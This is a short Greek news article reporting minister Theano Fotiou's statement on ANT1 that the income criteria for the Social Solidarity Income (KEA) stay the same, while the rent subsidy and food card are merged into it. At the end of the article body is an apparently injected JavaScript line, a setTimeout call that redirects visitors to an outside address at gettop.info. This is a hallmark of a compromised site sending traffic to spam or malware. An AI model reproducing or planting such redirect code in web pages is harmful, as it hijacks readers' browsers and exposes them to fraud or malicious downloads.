Φωτίου: Δεν θα αλλάξουν τα εισοδηματικά κριτήτρια για το ΚΕΑ

0
11

 

Εισερχόμενη στο υπουργείο Εργασίας η κυρία Φωτίου ρωτήθηκε στην πρωινή εκπομπή του ΑΝΤ1 για την κοινωνική πολιτική της κυβέρνησης. Στην ερώτηση αν θα κοπούν τα επιδόματα, η κυρία Φωτίου απάντησε:

«Όχι βεβαίως. Κλείσαμε τη δεύτερη αξιολόγηση, επιτυχώς κατά την άποψή μου. Δέχτηκαν οι εταίροι ότι πρέπει να πάρουμε 760 εκατ. από τον προϋπολογισμό όσο αξίζει το Κοινωνικό Εισόδημα Αλληλεγγύης κι επομένως δεν απαιτούνται κόψιμο επιδομάτων για το 2017 πλην ελαχίστων, συγκεκριμένα 8 εκατ. που καλύπτονται πλήρως από το Κοινωνικό εισόδημα Αλληλεγγύης. Το ΚΕΑ ςίναι μεγάλη πολιτκή, έχει τρεις πυλώνες, δεν είναι μόνο εισοδηματικό. Έχει υπηρεσίες ο δευτερος και ο τρίτος πυλώνας θα υλοποιηθεί σύντομα και αφορά στο 10% εύρεσης εργασίας σε όσους μπουν στο ΚΕΑ«.

Επιπλέον σημείωσε ότι δεν θα αλλάξουν τα εισοδηματικά κριτήρια για το ΚΕΑ, όμως επεσήμανε ότι καταργείται η επιδότηση ενοικίου και η κάρτα σίτισης κι ενσωματώνονται στο Κοινωνικό Εισόδημα Αλληλεγγύης. Η κυρία Φωτίου ωστόσο απέφυγε να απαντησει σε περαιτέρω ερωτήματα για τα οικογενειακά επιδόματα και να δώσει περισσότερες διευκρινίσεις. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here